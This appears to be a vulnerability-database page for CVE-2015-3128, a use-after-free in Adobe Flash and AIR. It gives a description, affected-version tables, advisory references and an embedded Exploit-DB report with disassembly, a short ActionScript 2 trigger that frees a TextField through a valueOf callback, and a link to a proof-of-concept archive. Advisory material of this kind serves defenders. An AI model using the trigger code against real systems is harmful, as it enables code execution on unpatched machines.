CVE-2015-3128
Description
Use-after-free vulnerability in Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK & Compiler before 18.0.0.180 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-3118, CVE-2015-3124, CVE-2015-3127, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, and CVE-2015-5117.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Adobe Flash AS2 - Color.setRGB Use-After-Free
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.
VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1
REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):
.text:004B82D0 push esi
.text:004B82D1 mov esi, [esp+4+arg_0]
.text:004B82D5 push edi
.text:004B82D6 mov edi, ecx
.text:004B82D8 mov ecx, [edi+94h] ; edi points to freed memory
.text:004B82DE and ecx, 0FFFFFFFEh
.text:004B82E1 add ecx, 3Ch
.text:004B82E4 mov eax, esi
.text:004B82E6 call sub_4B0724 ; crash below
...
.text:004B0724 mov edx, [ecx] ; crash here ecx = 3ch (null pointer)
.text:004B0726 cmp edx, [eax]
.text:004B0728 jnz short loc_4B077E
Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:
var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
tf.removeTextField()
return 0x41414142
}
var c = new Color(tf)
c.setRGB(o)
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zipOS impact
Linux kernel Fixed 1 release
| Version | Status | Fixed in |
|---|---|---|
| - | Not affected | โ |
macOS Fixed 1 release
| Version | Status | Fixed in |
|---|---|---|
| - | Not affected | โ |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| adobe | air | {"endIncluding":"18.0.0.144"} | |
| adobe | air_sdk | {"endIncluding":"18.0.0.144"} | |
| adobe | air_sdk_\&_compiler | {"endIncluding":"18.0.0.144"} | |
| adobe | flash_player | {"endIncluding":"13.0.0.289"} | |
| adobe | flash_player | 14.0.0.125 | |
| adobe | flash_player | 14.0.0.145 | |
| adobe | flash_player | 14.0.0.176 | |
| adobe | flash_player | 14.0.0.179 | |
| adobe | flash_player | 15.0.0.152 | |
| adobe | flash_player | 15.0.0.167 | |
| adobe | flash_player | 15.0.0.189 | |
| adobe | flash_player | 15.0.0.223 | |
| adobe | flash_player | 15.0.0.239 | |
| adobe | flash_player | 15.0.0.246 | |
| adobe | flash_player | 16.0.0.235 | |
| adobe | flash_player | 16.0.0.257 | |
| adobe | flash_player | 16.0.0.287 | |
| adobe | flash_player | 16.0.0.296 | |
| adobe | flash_player | 17.0.0.134 | |
| adobe | flash_player | 17.0.0.169 | |
| adobe | flash_player | 17.0.0.188 | |
| adobe | flash_player | 17.0.0.190 | |
| adobe | flash_player | 18.0.0.160 | |
| adobe | flash_player | 18.0.0.194 | |
References
- http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00017.html
- http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00018.html
- http://rhn.redhat.com/errata/RHSA-2015-1214.html
- http://www.securityfocus.com/bid/75590
- http://www.securitytracker.com/id/1032810
- https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
- https://security.gentoo.org/glsa/201507-13
- http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00017.html
- http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00018.html
- http://rhn.redhat.com/errata/RHSA-2015-1214.html
- http://www.securityfocus.com/bid/75590
- http://www.securitytracker.com/id/1032810
- https://helpx.adobe.com/security/products/flash-player/apsb15-16.html
- https://security.gentoo.org/glsa/201507-13
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.